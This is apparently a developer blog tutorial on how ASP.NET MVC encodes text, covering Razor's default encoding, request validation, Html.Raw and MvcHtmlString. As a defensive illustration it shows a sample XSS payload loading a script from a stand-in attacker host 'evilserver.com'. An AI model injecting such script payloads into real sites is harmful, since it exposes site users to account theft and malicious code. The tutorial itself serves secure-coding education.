Understanding Text Encoding in ASP.NET MVC (ASP.NET MVC Foundations Series)

[The code for this post is available on GitHub]

This article covers the various ways in which you might handle text encoding in ASP.NET MVC. For example, if you were writing a forum web app, you should absolutely be paranoid about what your users are typing into your site. You need to be very careful about how you redisplay their input. For example, a friendly forum user might write something like:

Nice post, thanks for sharing!

On the other hand, they may write:

<script src=”http://evilserver.com/xss.js”></script&gt;
<script>xss.doBadDeeds();</script>

If you turn around and show this “post” to your other uses, maybe they’ll get hacked. At a minimum, the evil-doers could be a nuisance to your real users.

On the other hand, if you’re building a CMS or utility helper method, you do not want to filter out the HTML a user might type. They probably need to enter some HTML which you’ll want to show to all the other users. Same thing goes for code your app might generate.

There are at least three ways which MVC manages and encodes (or does not encode) text data. Knowing which scenario you’re targeting allows you to choose the right option. We’ll look at four examples in this post:

  1. A forum app which can be hacked
  2. A forum app which is safe from XSS injection
  3. A CMS app with rich text editing
  4. Generating HTML in code for use in MVC Razor views

Protecting Against Unwanted HTML Inputs

First, the good news. MVC protects you in several ways against any sort of HTML / JS injection issues. When you write out string contents such as below, it HTML encodes it by default when using @.

If we assume commentText = “<script src=’evil.js’></script>”, then the output would simply be:

Comment text:
<script src=’evil.js’></script>

That is &lt;script src=’evil.js’&gt;&lt;/script&gt; in view source, which is perfectly safe.

Next, it is unlikely that this input ever makes it to your site. By default, if you have an action method taking this input, it will just error out with the following message:

Error on submit:
A potentially dangerous Request.Form value was detected from the client…

Of course, we could disable this with a ValidateInput attribute:

In this case, you must be VERY careful when you write out the commentText values later.

So far we have seen that by default razor outputs text in a safe way using @value. Also, POST requests are blocked if they have dangerous content unless you let it in.

In order to demonstrate these concepts, I created a working sample app here:

http://text-encoding-aspnet-mvc-by-example.azurewebsites.net/

View the safe forum and unsafe forum sections to see what happens. You can download the code from the sample as well.

Allowing Direct HTML Inputs

But what if you trust the input and need MVC out of the way so you can write true HTML content to the browser? One such example might be a CMS you’re writing. There are two cases you would treat differently here. Is your HTML coming from data given to your view or from code called by your view?

Let’s assume it’s handed to you as a string in a variable called cmsSectionData  (i.e. data). Then we can use the helper method:

   @Html.Raw(cmsSectionData)

rather than @cmsSectionData. This will make the contents of cmsSectionData part of your HTML in the view. You will also need to disable validation on any edit pages using [ValidateInput(false)] as shown above.

Check out the CMS section of the demo to see it in action.

Finally, if you are writing little helper methods to make your views cleaner (a good idea!), you’ll do something totally different. For example, suppose we frequently need to wrap images in links in our views. We could write it out in HTML each time, or we could write a method on a class we make called OurHtmlHelper called LinkWithImage. Here is an example implementation:

You might think we could write code like this:

But MVC’s encoding for @ would block it for sure. You could wrap it in an @Html.Raw() but there is a better way.

Introducing the MvcHtmlString class

The purpose of this class is to inform MVC to get out of the way and NOT encode the contents. So simply changing the return type of LinkWithImage to MvcHtmlString fixes it.

Check out the Helpers section of the demo to see this in action.

There you have it. Three ways to encode or avoid encoding HTML data in ASP.NET MVC applications.

Cheers,
@mkennedy

18 comments

Submit a comment